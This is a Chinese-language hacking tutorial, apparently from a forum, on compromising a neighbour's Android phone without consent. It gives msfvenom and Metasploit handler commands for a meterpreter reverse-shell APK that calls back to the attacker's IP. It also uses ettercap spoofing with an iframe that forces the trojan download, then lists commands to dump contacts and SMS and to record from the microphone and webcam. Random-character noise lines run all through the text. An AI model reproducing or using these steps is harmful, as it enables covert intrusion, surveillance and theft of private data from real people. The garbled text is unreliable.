|
+ u1 K" @, q: _" ~
五、msf+ettercap入侵邻居安卓手机
: N# `! S* U6 s* C* X6 o& `, y 0 t, k6 [$ a! r4 `
N5 C) z/ ]4 t2 L) q2 B. }
首先启动msf * U& C/ ?" _! L8 r4 H" e
% [8 X: ?/ C5 S* U. I. v; y) z q$ P9 y2 `/ t
先用kali生成一个安卓木马,如下命令:
+ J* p d4 C4 x$ ^% d7 x ( k% r. u g0 v% [- `9 Y& |
q- n3 _ h5 L) Z% D Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 2 f( W& ?; `7 F: N. Y, r
/ @# M1 @. \% d! ^" y; x) G+ P
: Y( S% C5 Q: g" p0 G
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
- i9 g) V* ~/ w m" S " N0 l; c/ k# T6 U$ t- {6 W# t' O
" y' p# u2 O, m1 P/ e 然后进入msf
) p V" u. T/ Y$ r * M/ U, s7 \* }3 F' S
/ k# l2 q7 c* i8 n5 i5 f6 \/ ]
use exploit/multi/handler
" a7 C8 \7 g4 s8 Z4 J " G$ W+ i/ _8 A7 J( Z) `
d3 s. J. e, ^5 w" G) T set payload android/meterpreter/reverse_tcp
|& d: n4 p6 @/ m$ i 9 \$ k8 c4 J6 B3 r/ h- \
" Z% d+ K! r6 b" k l set LHOST 192.168.0.109 //ip为kaili的ip 8 e: L8 Q" @* I0 }0 g& R
. r z; h& c* A7 m# N( q
/ O: [" a! m T6 O2 W2 |
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 K) u& B6 _) i6 v+ `+ ?- |" ?
, q3 b f; C$ r- E, W. m
8 g. F4 v/ h( y3 k' j! b Exploit
: L+ z3 o4 a0 Q/ a 2 m. Y c5 X# s' G G1 s
( m- w8 s$ n" ?1 M; I) S
& }$ N4 b2 n; o- H" }8 n5 ^: _
) {: M( q8 ^0 f" E( l
4 { d3 N$ m5 |: N8 M* u: T# I( ?- Y$ p
下面我们开启ettercap -G
0 r/ b% j: U9 {7 b% Y6 R- p% e% Y7 ^; D
1 u+ A! U& C" n/ h a+ k$ z* ? m' i- i/ z5 r* _1 n3 ?
我物理IP为
) o# N* a! F/ e1 L
( P1 C7 i' P; w4 w" \; n4 X3 ^) r; V7 P* O' I$ y* a
" ?( ?1 N& Z f
8 v" ]2 ^* L: t5 R9 V
2 u1 t5 @) T- n _$ w p2 ~ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
: }$ i+ d i. s" H' H& Q# A2 O# ?( g
. E' _+ N, G- P/ q: u- }$ y0 d2 |8 X% e5 h. u; u. {+ P
下面我们来设置一下 . {. j$ \0 i. }! \: ~' }# f
( x; I1 N5 |/ H& m- [5 V7 `- |- h
; L8 m l4 w$ M+ ] ] 1 J! `! j6 P; q
6 ^. r; }: n- g, }7 q0 j
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, : E; _3 R, Y7 i. z
& n6 _* h$ u% W( k
% m) A" d2 f' N* o
# I. D( B% |' D: `- ]/ ^* u
* J* t( I2 d6 j. X( q& ~0 H5 V- G/ R; N8 X: z, K
5 `) W/ K8 k( y
, }2 y- n& d% [# m0 y5 E0 e
# d1 S0 @5 ~. d" e' `; A- _+ T
$ [- c S) U3 ]1 s$ D4 s , ]8 a7 C- d, b6 l& ~
# [6 x- H/ c% V* d! h" D k! ^) k8 _* [$ A' [$ v. j1 L& O
7 B6 w! c; L0 B4 F. M# t3 S
9 L1 D, ]6 T# j& b 9 ]' w; L. l8 G- n: b( d3 P( x& o
' C+ A! ?# ^4 M; N9 @: Y9 X. {, d; s4 N J% H2 k: h0 o. F
- K' k( g; O5 _6 }3 o. }+ v$ M : K$ R* s; R6 y' H
0 D% {1 ^ b/ w0 a5 Q
) H6 T7 X1 |! U- d% R; C. ?6 ^
- ^" L R* ?2 W' D( |' m6 l1 y3 X# Y. ~- D7 k
8 D' W- N9 v6 A' [ 2 {7 E! Q$ Q, @$ w2 y- p( z2 j# p' i
% u i/ l$ s0 r- b
; z( P) C- D4 F9 B1 m/ z
E1 s8 ^, m! h, g& j' Y6 O$ W/ J6 p U. a Q# W% g# a* S8 T" {
' m& s6 C, |; G. T% W; G' m- U
9 O/ b8 P1 ^# S% X" y' a: D$ W# }8 v5 J2 v( [; y2 K3 f
6 {& [6 ?4 Q9 H. X 7 ^2 n/ l; P0 w
/ j# T& b6 L1 k- f {- p6 r
) G% Y6 p2 F% Z7 E9 I
/ b0 r- v; f9 P D
" u/ j9 o/ C0 S! g/ ^
$ Y' A7 x3 ^# v; h& f+ [" R . ~5 T3 G* a$ s5 v! Z4 C
/ k. d9 Q% Q$ `7 ^# K0 ~ 下面我们开始攻击
: Q6 Z+ b A m
% ?- W4 S2 j! H% A6 H; u0 o
9 p" v% C3 {+ e( e8 Y4 a
5 Z& y$ C1 [2 k: w7 ~6 m! |2 q5 O
# r( T. E3 e* c: F* W! F% }3 D3 R- H! j- K) ]1 K
# S& E/ ]$ X$ j0 t4 A/ G n
5 a p! }4 @% v3 I" _4 R! ^: v* m- A/ d7 W) Z& E( d, y! s- S+ W
) C3 j& n& f/ x. ]' y9 k' O! j
' ]7 j! x0 S9 g$ P& i
( D) L; b8 j* s% K / @; t, U8 i% ?$ l
9 Q* D6 {* `0 Z
8 x w. v& z, O* U. \. ?- L. W |; ~5 H8 z5 ^
6 I7 R9 q: ]+ |. ]3 U9 ^5 i0 a) z, q" ^5 G! ?
大概过了5分钟多,发现反弹成功了
$ ]. V- J3 y- p2 l. O9 I
+ i) M+ e; \! w+ x
9 U y! h+ ^7 Q- |
9 i* T! |+ E$ l: Z ( T" x- N) Q- Q5 O; ?
m- s6 ^2 a( I* `- _! Z3 Q; J$ u: S , x. o; f! Z7 R/ j! i
" y2 L! o5 V5 `
* |5 v8 s# D& b# x- Z* Q
/ m8 v K# I) M7 F4 f3 }
% c; f1 }0 I' O$ s+ {# ^* n1 n' E" C6 ^. f! A
8 q6 [5 O4 R* T# G! v5 b $ ^- O. V. c: p
& i2 g7 P0 ~6 K5 G
. y) n6 p4 z; `5 A) h4 {- o0 x4 E
& D( G* |5 h7 w3 f' v. L3 g8 Z' q
" A6 N T4 e- G: r/ U: t
% [0 ~! O3 R% i# q8 _
) U2 C! k. E8 U' N U* U3 c$ Y" a: E: h& ?0 t* ]3 _2 ?
3 C5 L! W/ h7 L8 X" D
4 Z/ M: q' f' |7 k8 {$ R7 J% X$ s
5 |: E) k! y- @: U6 c: e" e: o 执行命令
) i% c, M& m0 o+ q8 @" s " E" Y' N% J! B F4 d2 ]! s9 t. K/ h
) @" p5 L2 N; P) D8 L } b, a
8 L& V0 Z+ w0 z$ G: ?2 U
. }3 t# U6 z8 p8 ]% n
3 w+ H+ _* e1 X. T- v- X% W
dump_contacts --》这个是导出电话
& L* b0 H# @, e X2 ?, h 2 L( H' e8 a, q: J# I, M, L# _. C
2 g/ r( ~6 p' C dump_sms --》这个是导出信息 ( ~3 i$ {5 t) L! q$ u j
! f# k( W! [: L7 @+ D! T
: h3 J A! ?( X. `4 k
record_mic Record audio from the default microphone for X seconds ! U; o7 A0 m% p- h7 B8 d
n, Q3 w4 ~ w, L
, `9 }3 M) G; F8 b6 v8 I: W webcam_chat Start a video chat
k5 Z# ]( o6 i' `$ _
2 n& r0 c, M% m$ l# J: S4 B8 Y8 f; O$ J
webcam_list List webcams
+ \. e3 _6 p, n5 |$ v+ {
- w0 I2 ?& Q# `' t @' {+ O: a5 F3 b7 j! G
webcam_snap Take a snapshot from the specified webcam
+ X+ V4 T) b1 e8 W6 d, ^' u 5 B8 |: w7 R% u8 F2 m6 b
+ x3 ~( a$ e1 X9 P# |+ d webcam_stream   lay a video stream from the specified webcam - s& [3 ]# [+ H s8 K$ z) O0 S
& P2 ]/ d t" d) _& O( U' I8 y* X/ Y: r) l; z% e4 M
( O4 R" ]# c' Z6 [. S
0 F- |/ }* @ j& J
6 a6 h( x3 B& n
2 R' @# _* r$ n, A2 L2 ` 3 _0 U- x0 Y6 D1 ?5 O
7 {# T# `, z2 T5 n/ I
我们打开看一下电话薄, 1 U: S& x% M7 e' e
9 k2 ^; W- ~( R0 y* r
8 X* b& d, l. l/ ^, X7 K + |, S7 O* W, _0 M6 X3 J
+ y* O" u6 C$ C* G, _
# G4 q* Z/ \/ C/ `& e # W$ E6 \. s1 ]5 B I4 O
% A8 d, m& k% x/ t" P
# H# L) o4 i5 \ u
1 W* A. l, Y' D' y( R- ~ R
0 h3 d" P+ a* e* w5 J C% I1 r$ O9 Z5 ~4 n/ n
) [" K8 |5 `! z% u! l ' U: t$ J4 \8 }- e$ z% c1 Y6 Q
5 H+ L' t% t! d( i0 y+ c' f
F* P2 P2 X" b0 D" a# L; b; s
7 z6 a8 Z* x" ^9 H. I t! F! |
0 k \/ Y# E. I; w4 D: c
4 }& c% R# g# f0 u6 O6 Z
3 g# @3 T' H( z8 b! R8 S 我们同时欺骗成DroidJack木马,使用方法如图:
8 ~7 x/ ]) ?" Y
0 |. S/ B' O" g; t
9 D' j/ M2 _$ v c& f7 z # ~ D: v" \) g! ^9 v4 J
# u! A! \" `- Z/ z. l0 G( A4 C( v' R* t" R, h- b( Z+ r9 h4 W
9 K) T8 H% o" H6 j; s o) N
- f4 f7 o. J5 K0 ~% e1 a* q: K$ r V/ u; e; o0 B# ^ W- j% W( n
2 Q( _ e s8 L( S- x7 T
- U' G9 E) t% i; m; S6 T2 z
# c1 A6 c- |/ ^8 g: l 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 2 A- r( K8 A9 Q9 D! f3 o
8 E1 [% n) n2 y3 Z- Q& Z
5 q6 i4 f7 N0 C5 M
5 H$ U. c" X+ O # _& a& F$ O3 ?' O0 O8 ^
, A3 @4 i& V. ^
: P: h0 ]+ o1 D) q5 P
: W' a0 k+ _8 g9 k) V+ G/ l" U- h4 K: }4 n2 a1 S# }& c7 D' H
0 R% n' _2 U8 r: a
2 T/ _$ Y: D+ n2 L$ X7 F* F/ m" u$ P) e2 s; o
 n: X8 z# P0 z1 ]
2 H- h! _! C6 ^7 M& f- u5 p( t! @
4 w6 V3 s- A+ ?! l: X) O
|